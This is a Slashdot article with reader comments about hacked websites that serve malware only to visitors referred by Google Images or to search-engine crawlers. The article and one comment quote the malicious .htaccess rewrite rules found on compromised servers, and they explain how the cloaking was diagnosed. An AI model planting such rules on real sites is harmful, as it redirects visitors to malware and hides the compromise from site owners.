Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
Security The Internet

Image Searchers Snared By Malware 144

Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

This discussion has been archived. No new comments can be posted.

Image Searchers Snared By Malware

Comments Filter:
  • Should Be Shot (Score:3, Insightful)

    by Anonymous Coward on Thursday February 04, 2010 @10:35AM (#31022778)

    Malware and Virus authors should be lined up against a wall and shot. They are cancers and need to be irradiated.

    • by sycodon ( 149926 )

      I mean eradicated...although irradiated would probably work well too.

      • Re: (Score:3, Insightful)

        by Spyware23 ( 1260322 )

        What we -should- do is focus on things that we can actually benefit from. Instead of mass-murder, why not fix the internet by fixing javascript (ie. dis, fucking, allow, whitelist basis only), fixing flash (bye), fixing CSS (stop reading my history and stop scanning my ports!) and fixing HTML so we don't need to rely on stupid things (flash, silverlight, the thing Google made) to make browsing an enjoyable experience.

        I can deliver you a browser that is virtually unexploitable. Firefox running with NoScript,

        • How do you expect to "fix" HTML to provide advanced features after we've gotten rid of javascript, Flash, and Silverlight? And what does CSS have to do with reading your history and scanning your ports?
          • Everything. I'll just throw a couple of links at you and then you can go be scared.

            http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

            I suggest that if you want to be up to date with the web app security world, you should keep reading blogs of security researchers, and perhaps security research-related fora (like sla.ckers.org).

            As for your first question, I suggest you read the HTML 6 specs that have been presented. Also, remember that a browser is just a t

            • Re: (Score:3, Informative)

              I'll just throw a couple of links at you and then you can go be scared.
              http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

              Well, I just visited both of your links, and am unimpressed and unscared.

              The CSS history one gave a very short list of what looked like guessed web sites which were mostly wrong (hint: I never visit msn or ebay or myspace, and it's months since I visited yahoo). It looked like blind guesswork, as the list had google, but not slashdot, for instance. Clicking through to see what information they claim to have logged, I encountered an empty list, not even the bogus guesses of wrong web sites that were on th

              • Forgot to mention: Javascript, Java, and Flash were all enabled when I visited your silly "scary" links.
              • Re: (Score:3, Informative)

                That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item. The exploit can only check a specific list of items. The problem is a UI/implementation one, not a problem with the concept.

                • That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item.

                  Perhaps you should check your code again.
                  It showed the red "visited" text in a box beside all of the incorrect IP addresses and the 127.0.0.1:8080 combination. I reiterate that my LAN is not on 192.168.0.* or 192.168.1.* but the page claims that I visited addresses 192.168.0.1 192.168.0.2 192.168.1.1 and 192.168.1.2 which is clearly impossible. In fact, it does that even when I use a PC which is directly connected to a public IP, and not on our home LAN.
                  FYI we have 8 fiber ports at home, each with a publ

                  • It isn't my code.
                    When I visited it, it correctly showed that I hadn't visited any of those IP addresses. The other page correctly identified which sites I had visited, even after clearing my history and after re-visiting them.

            • by abigor ( 540274 )

              Neither of those links provided any kind of accurate information. Very non-scary, I have to say.

              • 1 out of 5 websites were right, and honestly John Edward would have gotten at least 2 right, that includes the google that the site actually got right.
        • The reason this will never happen (and it should) is because we have art students, not engineers, designing our websites, and thus calling the shots.

          Some parts of computing should just not be done by non-technical users, designing secure systems is one of them.

          • Re: (Score:3, Interesting)

            Okay, only a Professional Software Engineer can design webpages or write code. In BC, that's an actual discipline for Engineers. (I'm Electrical myself; one of my friends has her P.Eng in Software, and my alma mater was one of the first to offer it.)

            See how that works?

            The real problem is really your attitude, not the fact that "artsy-fartsies" are writing webpages in Dreamweaver. We can talk about the relative merits and security of Windows / OS ? / Lunix all day (which, really, is what /. is all about) but

            • I'm not really sure what you are running off about, but I'm fairly sure that at least a fair chunk of it is unrelated to my post which you are responding to...

              I was simply indicating that getting rid of plugins like flash, locking down javascript, and in general getting the seperation of data and executable code right is never going to happen because the people who are currently calling the shots and driving the market either do not understand computer security, or do not make it a priority.

              In my opinion, t

            • "We're outgunned and outnumbered."

              Because of that, I can see a future where active monitoring/detection of system changes is going to become more important. Maybe even services that either log into your machine and look at file size, diff, etc.. or actually make requests of your website, mimicking every possible thing a user could do, and look for unintended outcomes (file automatically downloading, for instance.)

          • Re: (Score:2, Insightful)

            by nomadic ( 141991 )
            Some parts of computing should just not be done by non-technical users, designing secure systems is one of them.

            If those non-technical users are able to create security holes, than that's the engineer's fault.
            • Re: (Score:3, Insightful)

              by Sir_Lewk ( 967686 )

              I'm not saying that nontechnical users create security flaws, I'm saying that they demand features that cause security flaws, and the engineers that know better are not in positions to deny them the features. If a high payed media PHB demands that the website for [NEW HIT MOVIE] be made entirely with flash, a lowly engineer pointing out that flash is insecure is not going to get anywhere.

        • Honestly, just making javascript operate on a whitelist basis only would reduce online malware attacks by about 99.5%

          I realize that I am far from an average user, but I have been using computers for 30 years (the last 15 using Windows) and have never gotten a virus, worm, or any other form of malware on a single computer I have ever owned despite not really using AV software, always logging in as admin, and spending an inordinate amount of time acquiring software on 119th St.

          I don't deny that these things exist but obviously the user is the weakest link as everything you have said is already available to any user who know

          • Question: What is your process to determine that every computer you've ever owned has never been compromised by malware? Are you doing some kind of checksum on system function and monitoring each inbound and outbound network packet? Not all malware generates a big red flashing skull on your screen. The malware that operates quietly and gives no indication you have a problem is the stuff you need to worry about. Malware frequently actively attacks anti-virus software on top of this; leading to an increa
        • So - I'm sitting here, reading about this newest manifestation of exploitable exploits, and wondering: "how does all this affect Debian?"

          Then you offer up some solutions that would actually start to FIX THE PROBLEMS.

          No script - check.

          Adblock plus - check.

          Turn off Flash - check.

          Ditch silverlight/moonlight - check.

          Disable Java - check.

          What's left? Oh yeah - don't click on obvious bogus links, and don't agree to download a virus scanner. Like, I really need on on Debian.

          What does that leave? Hmmmm. A damn

          • You are well informed and protected, but even plain CSS is an attack vector. Yes, to be safe, you need to disable CSS http://search.slashdot.org/comments.pl?sid=1537058&cid=31023480 [slashdot.org]. Also, extensions like LocalRodeo, SafeHistory and SafeCache might be worthy add-ons to your arsenal. Although some of those extensions might be deprecated/unusable in the latest version of Firefox/Iceweasel (even with Nightly Tester Tools).

        • Firefox running with NoScript

          Just to whinge for a moment, Firefox+NoScript really get on my tits. Seems like it wants to add a new update to one or the other every bloody day.

    • Yes, becasue over reacting and making the punishment much worse than the crime is ALWAYS a good idea.

      I also say execution for jaywalking, littering, and spitting in public.
      • by sycodon ( 149926 )

        Are you sure it's an over reaction?

        • Re: (Score:1, Troll)

          Yes. Any other dumb questions?
          • All your post tells me is that you never caught Vundo on your computer. Your attitude toward bored, Russian malware writers drastically changes. The first time you get it, it's as painful as a digital kidney stone -- and someone, somewhere is making money from your suffering.
            • Cleaned up Vundo many times at work. Yes it can be tricky, but I still maintain that it is not worth murdering someone over. I don't have any love for malware writers, but I do have lots of love for the punishment fitting the crime, and tons of love for not having stupid knee-jerk over reactions to things.
    • Only if the malware directly caused loss of life, or raped some kids or something, would I even consider such a punishment fair.

      No, messing up your PC, making your admin job harder, or even stealing your identity and buying a mansion in your name should not be a capital crime.

      • by sycodon ( 149926 )

        I'm sure many of Madoff's investors would disagree.

        While my original comment was somewhat tongue-in-cheek I think this game between the virus writers and anti-virus writers is far more serious than most people realize.

        Having your identity stolen and your credit rating ruined can be a life changing event. Lawsuits and even jail time for you are possibilities.

        These days, having you computer hacked into, damaged, or data deleted can the be the equivalent of someone breaking into your home and destroying things

  • orly? (Score:5, Insightful)

    by Pharmboy ( 216950 ) on Thursday February 04, 2010 @10:39AM (#31022834) Journal

    While I use Windows on the desktop to manage my linux servers like most admins, I find it hard to believe that 90% of all break-ins were caused by an administrator's Windows box getting owned first, to capture their password/login info. That means only 10% of the boxes were directly attacked and owned, yet my logs show overwhelming amount of tries to do just that. This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows, and just smacks of bogus accounting.

    • Re: (Score:3, Interesting)

      by T Murphy ( 1054674 )
      I don't know linux and the malware fight very well, but are those direct attacks intended to work on Windows machines, so that those 10% are the only attacks that even work against a linux box?

      As a slashdot reader who doesn't know much about linux, it often sounds like linux is this magical program that can't do wrong, so clarification for the under-informed would be helpful.
      • I have no doubt that malware is likely for linux, but unlike Windows, you can't guarantee a compatible vector for every linux box. Read for instance the problems Google has had with Chromium porting to linux. They couldn't even expect a consistent thread API to be there, depending on whether you were a 2.4 kernel, a 2.6 kernel with pthreads, a 2.6 kernel with NPTL only, . The cost/benefit ratio is just not there for someone to put the time into this kind of attack vector. The code written would have to be b
        • It is like the difference between a job that earns $6 per hour doing ditch digging or a job that earns $300 per half hour just to tell someone they are crazy.

          Our half hour is up. The secretary will handle your bill.

        • You just use Perl. It's trivial. And as an added bonus, obfuscation is a first-class language feature.

        • Keep in mind that the vast majority of these attacks are not going after kernel flaws, they are typically going after PHP or MySQL flaws, or default PHP/MySQL settings more than anything. Some obvious Windows exploits are tried, but not that many as it is easy to test if a server is Windows or Linux based in a script, so that is rare in my logs. I haven't run FTP in years, but I remember a bunch of attempts using dictionary attacks when I did.

          Of course, the most common attack is simply SSH logins using co

    • by Yaa 101 ( 664725 )

      Why would you use a Windows desktop to manage Linux servers? I think that is totally ineffective.

      But hé, it's your setup and I won't be bothered with it.

      • I would imagine it is incredibly common.

        You can manage it all you want with putty and still connect to your companies exchange server with outlook.

        I'm not a professional admin...but in school I did a bit of admin work on some linux/BSD servers. Most of the work I did was probably sshed in from a windows box either at home or in our little office (before I installed linux on a machine there); I only admined from linux if I was fixing something from class with my linux laptop or if I was standing at a [*

        • Re: (Score:3, Informative)

          by swb ( 14022 )

          Incredibly common bordering on likely the outright majority.

          For one, its likely that most companies will have some kind of Windows infrastructure and/or Windows application requirements and thus will hand out Windows based laptops/desktops. Admins with a OSS religious affiliation may end up overwriting these systems with Linux or building their own in parallel, but controls/obstacles/requirements/misc bureaucratic bullshit may stop all but the most senior from being able to do this or make it too much of

    • This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows

      You mean to say that such servers' pwned state is the result of improper security practices on the result of a Windows user. [/pedant]

      In all likelihood, I don't see why this wouldn't be the case. Unless these sites are running some type of publicly available CMS product, like Wordpress or Joomla, chances are good that these sites are uploaded via FTP. There was a feature on Slashdot, it may have been Mr. Hassleton's writing, too, saying that certain types of trojans will scan your incoming and outgoing

    • by nasch ( 598556 )

      That means only 10% of the boxes were directly attacked and owned, yet my logs show overwhelming amount of tries to do just that.

      And how many were successful? I think they're talking about the times a machine is compromised, not how many times it's attacked.

  • The free antivirus packages are fine, there is no need to pay for one.

    • Re: (Score:3, Interesting)

      by Pojut ( 1027544 )

      Agreed. I used AVG for years, and when it became too bloated I moved to Avast. Haven't had a virus on my windows box in close to five years.

      • I haven't used any antivirus software on my Win2K box in the past 9 years and NEVER had a virus in that time.

        Firefox with Adblock Plus, Noscript, and Flashblock. That's it!

        I noticed some sluggish performance recently and suspected malware or a virus. I installed MalwareBytes' Anti-Malware, Clamwin, and Spybot S&D, ran them, and all indicated my system was clean.

        The problem turned out to be a badly fragmented hard drive (haven't defragged since 2001 or 2002!)

        • by RulerOf ( 975607 )

          I haven't used any antivirus software on my Win2K box in the past 9 years and NEVER had a virus in that time.

          I used to do the same thing, specifically because I didn't want to take the performance hit I have always associated with running an AV product.

          Fast forward a few years, I'm running a dual core chip with gobs of ram and (though I know I'm a minority on this one) an extremely fast hardware RAID controller, I can drag and drop 100GB of data, defrag an array, and run a virus scan... while playing a video game.

          In that time, my AV has caught a few things I didn't suspect were infected, and a few I had expected

        • by Pojut ( 1027544 )

          As I said previously, I haven't had a virus detected nor have there been any warning signs of one in literally years. The only reason I still run the software is because I'm paranoid.

          Remember...just because you are paranoid doesn't mean they aren't after you!

      • by G00F ( 241765 )

        I have seen way to many people with AVG installed with up to date definitions, and have viruses. I now suggest Avast as a free solution or even better pay for trendmicro or kaspersky.

  • by santax ( 1541065 ) on Thursday February 04, 2010 @10:41AM (#31022850)
    Man, this is how I view my porn, and I use that method just to be safe! What now :(
    • Re: (Score:3, Insightful)

      by Thanshin ( 1188877 )

      Man, this is how I view my porn, and I use that method just to be safe! What now :(

      A live disc?

    • Re: (Score:1, Funny)

      by Anonymous Coward
      1: Get a usenet account
      2: Get a good binary usenet reader
      3: ???
      4: pro(n)fit!
  • Immunity ? (Score:1, Interesting)

    by Anonymous Coward

    I visited one of these sites , because I'm a limited user, the Malware didn't install .
      So I question how much of this is because consumers foolishly run as owner.admin? or disable UAC .Then those that run Linux or a Mac are likely to be immune and probably in that order. Linux machines being much more secure .

    • by Nadaka ( 224565 )

      I don't think we have enough information to "know" that linux is "much more secure" than mac. Both have a handful of known exploits (vs a overflowing truck load of exploits available for windows). Neither one is proof against infection.

  • by Itninja ( 937614 ) on Thursday February 04, 2010 @10:46AM (#31022918) Homepage
    For all that are hypersensitive to misspellings. The term 'referer' is not [wikipedia.org] a typo (at least, not in this article).
    • Re: (Score:2, Funny)

      by Tablizer ( 95088 )

      Wikipedia: "[standard] co-author Roy Fielding has remarked that neither "referrer" nor the misspelling "referer" were recognized by the standard Unix spell checker of the period..."

      So if it's not in Unix, it doesn't exist, eh? ;-)
         

  • by T Murphy ( 1054674 ) on Thursday February 04, 2010 @10:47AM (#31022924) Journal

    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

    I don't see Bing on there.

  • Okay, insert obligatory "One more reason not to use Windows" comment here, after all, this is Slashdork.
    Yup, Linux and OSX can get infected as well, but it's harder to do so. Especially if you approach it from the point of view that it can happen to you. If you just have to use a Windoze tool, do it via a VM of some sort, pick your fave brand of VM to do so. Some tools (native VMware VI management tools) are only available for Windoze, so I use a VM to run those tools. Other than that,

    • Slashdork...Windoze...really? Really!?!? Why don't you throw in some fake backspace characters, a "meh," and a <sigh> while you're at it?
    • Note that using a Linux VM on a Windows host is *not* the fix. Using a Windows VM on Linux is *not* a fix either. Your passwords can be gathered in either case*.

      as WOPR said: "The only way to win is not it play [with windows.]"

      * I am realizing there is a way to semi-secure things. If you use a proxy to provide passwords to sites, you never have to type a password in. The accounts could be gathered according to a database, and once you got prompted for a password, the proxy could present an on-screen keyboar

  • Another one (Score:5, Interesting)

    by The Redster! ( 874352 ) on Thursday February 04, 2010 @10:53AM (#31022992)
    This is actually not a new trick. Guy I know once had his website serving up an evil redirect at random like half a year ago -- something like every 1 in 5-6 requests, and then still only with a Google referrer. Even asked me to capture the header with the redirect because his hosting company wouldn't believe him(they eventually fixed it).
  • by MonsterTrimble ( 1205334 ) <monstertrimble.hotmail@com> on Thursday February 04, 2010 @10:54AM (#31023006)
    Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images. That means they are trying a pretty limiting technique which I presume is because that all other methods will not yield as good results.To me that means people are getting better at this anti-virus thing.
    • by HTH NE1 ( 675604 ) on Thursday February 04, 2010 @11:14AM (#31023290)

      Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images.

      Yeah, because everyone knows Google Images users are Slightly Irregular.

      That means they are trying a pretty limiting technique which I presume is because that all other methods will not yield as good results.

      Or it's a proof-of-concept implementation being tested for more insidious deployment, say attacking only those who are coming from a (your!) bank's domain, or a government site, or a link from Google Mail embedded in an e-mail's image fetch to confirm your identity as a Chinese dissident.

    • This is just one attack technique among many being used successfully.

    • by RulerOf ( 975607 )
      It's not that hitting all surfers would yield fewer attack victims in a given amount of time, it's that hitting all of them means that the malicious code is more likely to get caught by an admin. If the malicious code is only active for 24 hours but hits everyone, chances are low that such code will actually result in a successful attack. However, if it can linger for longer periods of time, months or years, and simultaneously evade safe-browsing filters provided by MS/Google/Mozilla, that's likely going
  • by DesScorp ( 410532 ) on Thursday February 04, 2010 @10:58AM (#31023064) Journal

    I've got an old Mac at work I use for various tasks, but I use Windows at home. And it's loaded up with all of the standard defenses... firewalls, anti virus, malwarebytes, spybot s&d, you name it. And yet Windows boxes are still getting owned. And its not even necessarily "bad" websites that are spreading this stuff... porn, torrent sites, etc. There are a lot of websites out there that have no idea that they've been owned, and that they're spreading this filth to Windows machines. The latest trojans with "Internet Security 2010" infect Windows boxes so badly that it often takes longer to completely clean them than it does to just throw up your hands and decide to nuke and pave.

    I know Macs will eventually be a bigger target when they get more of the market, but after one of my family machines became infected... again, despite having all of the necessary security software... I decided it was time to spring for a Mac Mini at home. Better that the wife and kids learn a different OS than Daddy pulling all of his hair out because of yet another damn trojan... despite best efforts to the contrary.

    • Re: (Score:1, Interesting)

      by Anonymous Coward

      Why not just patch your machine and save the extra money instead of buying OSX? Compare how often OSX patches it's OSS software versus say Ubuntu

    • by NatasRevol ( 731260 ) on Thursday February 04, 2010 @11:31AM (#31023506) Journal
      I've always said...Windows is cheaper if your time is worth nothing. Wipe & reinstall is your wasted time. That and fighting all those viruses/malware/spyware/etc.

      Macs aren't perfect, but you spend a LOT less time trying to make & keep your system secure.
      • Funny, I've only had one virus/spy-ware/mal-ware in my entire time using Windows, right from 3.11 to current. And that was my roommate getting his Windows ME machine pwnd and letting it sit on the network. I defrag my machine overnight once a month or so. I ran without an active AV scanner for over a year. As it is, just out of habit, I'll run Spy-bot once every few weeks, and I threw Avast on there, and run it too. Always overnight. Total time wasted? About 5 minutes setting them up.

        Now, on my Mac machine

        • by Ifni ( 545998 )

          I've wasted more time trying to make my Mac work properly than I have keeping my Windows box secure.

          Yes, but you've looked cooler doing it, and isn't that what REALLY counts?

    • If your kids are installing these trojans via warez, cursor packs, or other gizmos they will get your Mac Mini into trouble too. That is unless they don't have admin access. But why would you give your children admin access to any box?
  • The gratuitous comma tag is incredibly appropriate. It's important to remember that if we hope to keep the next generation of students adept at the English language [slashdot.org] we might want to set a good example.

    Since I've referenced poor grammar, there's a 99% chance I made a spelling or grammar error in this post.
  • Yeah, this is pretty scummy. But I've gotta admit, it's also pretty creative.
    • Yup, chuck these guys in prison for a year, then when they come out, hire them at $xyz000 a year, and get them to be that inventive with stopping others.
  • We got hit by this (Score:5, Informative)

    by hedronist ( 233240 ) * on Thursday February 04, 2010 @11:47AM (#31023700)

    We get so many 404s because of probes from random script kiddies that I tend to ignore that part of the daily log scan -- big mistake. (I have my own link checker so I know that all of the real URLs are correct and functioning.) It wasn't until the site owner said that we seemed to have dropped off the search results at Google that we knew something was wrong. I couldn't figure out why and spent quite a bit of time banging my head against random walls.

    Although I had looked at the logs I was mostly looking for 500 errors. I finally started to focus on the 404s and little bells started going off when I saw a whole bunch of them for msnbot. And then I saw a whole bunch for googlebot. And then I noticed that they were all under our /media path. I immediately started checking all of the URLs that had 404ed and they all worked fine. Google was also reporting that they were getting a 404 on our sitemap.xml. Shit! I tested it with their 'Test you URL' page and it worked, so I resubmitted it and ... it 404ed! WTF? (I'm still not sure why this got snarled with sitemap.xml, but it was involved.)

    I went and took a long, hot shower -- this is my place of refuge and deep thinking. The question was: what could cause all of these errors for the spider-bots, but not produce them for me or any normal human? I looked like a prune by the time it hit me: they weren't seeing the same pages/files I was. How could that happen? If this was a networking problem it would already be smelling like a firewall issue of some sort -- the unseen middleman.

    I should mention here that this is a Django site, which means I'm pretty much all over the URLs coming in ... except for /media, which are handled directly by Apache as static files. Apache ... hmmm ... !

    Apache's .htaccess file is probably the single most powerful file on your website, and you don't even see it when you do an 'ls'. I popped into the editor and I almost crapped my pants:

    RewriteCond %{HTTP_HOST} (^|www.)example.com
    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g|gif|png|zip|swf|doc|xls|pdf|ico|tar|gz|bmp|rar|mp3|avi|mpeg|flv)(\?|$)
    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$
    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^65\.5[2-5]\.[0-9]+\.[0-9]+$ [OR]
    RewriteCond %{HTTP_USER_AGENT} (google|msnbot)
    RewriteRule ^(.*)$ pop/media/images/07_22/7_22-5.class.php [L]

    Those address ranges, btw, are all for googlebot and msnbot, so this only fires if you are coming from one of those net blocks. The special google URL checker wasn't coming from one of those addresses which is why it worked.

    The scary thing is that this code is correct except for one little detail. The bots were getting 404s because the Black Hats got the path wrong. This isn't a normal PHP site and the topmost directory contains all of the Django stuff in one branch and all of the media in a different branch. Apache sees that topmost directory and it's where the .htaccess file lives, but the master .conf file has a specific <Location> rule that maps directly to /media, not /pop/media. If they had not made that error I don't know how long it would have taken to uncover this.

    We still don't know how they got in. We changed all of the passwords and double-checked that we were up to date on all of the server code. There also are multiple levels of tripwires in place now so I'll know about any changes within minutes of it happening. And now we wait . . . .

    • by CoffeePlease ( 596791 ) on Thursday February 04, 2010 @12:01PM (#31023848) Homepage
      If you run insecure web apps, they can use http injection to write to your .htaccess file. See my post on how I fixed my own site after one of these attacks. http://thedesignspace.net/MT2archives/000505.html [thedesignspace.net]
    • Wow, very frightening. You've already been modded Informative, but more people need to read and understand this.
    • Re: (Score:3, Informative)

      by xandroid ( 680978 )

      If your site is on a shared server, it may be the case that another user of the server got hacked (or is malicious in the first place) and was able to access your files. In this case, it's a very good idea to notify your host that your files have been messed with.

      Something you may consider: make a backup of a known-good .htaccess, and set up a cronjob to `diff --brief` the two frequently and email you if they're not the same. I've done this with a list of all the PHP files in my account on a shared server:

      7

      • Good points.

        This is a dedicated server and has only three accounts with passwords, all of which are strong. Only 4 ports are open: 22 (SSH), 80 (HTTP), 443 (HTTPS), and 8000, which is where I do short runs of the Django development server. The dev server port only responds to a very short list of hardwired IPs. SSH disallows root logins. Apache is chrooted and uses suexec. This last wasn't true before and is quite probably the entry vector.

        I mentioned tripwires. Since everything is under Mercurial VCS

    • Hey, a fellow django'er :)

      A bit off-topic, but do you load PHP in the same apache as you run your django project?
      I've had some problems with that (shared libraries), plus I don't need php, so I usually turn it off.

      As a side effect, it would help against such an attack too.

      • Sigh, yes, we do have mod_php and mod_python in the same server. Although I had a problem combining the two on another site (also a Django site, but with an osCommerce store (and, no, I didn't anything to do with that piece of crap)) and it turned out to be a problem with shared MD5 libraries (if memory serves, this was almost 3 years ago). Here I'm running it just because I like phpMyAdmin.

        Now you've made me feel lazy and bad and I hope you're happy with yourself. Maybe I'll run an alternate Apache with

  • Kudos on the work you did to figure this one out! I appreciate the time you took to investigate this one.
  • by Sloppy ( 14984 ) on Thursday February 04, 2010 @01:23PM (#31024952) Homepage Journal

    But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked

    The very idea of "verifying that a site is not hacked" is ultimately just as flawed as running a virus scanner to verify that you don't have a virus installed. Once a system is compromised, you can't trust it to help you find the problem. Checking to see if it happens to be serving malware right now, isn't reliable since the malware gets to decide whether or not to act suspiciously, and making decisions based on referer and user-agent is really just the tip of the iceberg compared to what is possible. What if it randomly decides to serve malware on 0.01% of the requests? You'll never be able to diagnose it that way, and in the unlikely event that you do happen to see something suspicious, you're going to start questioning yourself when it turns out to not be repeatable.

    Don't install the malware in the first place. I won't say that defending in depth beyond that point is totally useless, but it's pretty close to useless. Once you're infected: game over, you lost.

  • by Anonymous Coward

    Firefox + Greasemonkey + "Google Image Search Direct Links"

    That puts an extra link on each picture on the Google Image results. A link that just gives you the JPG and nothing else.

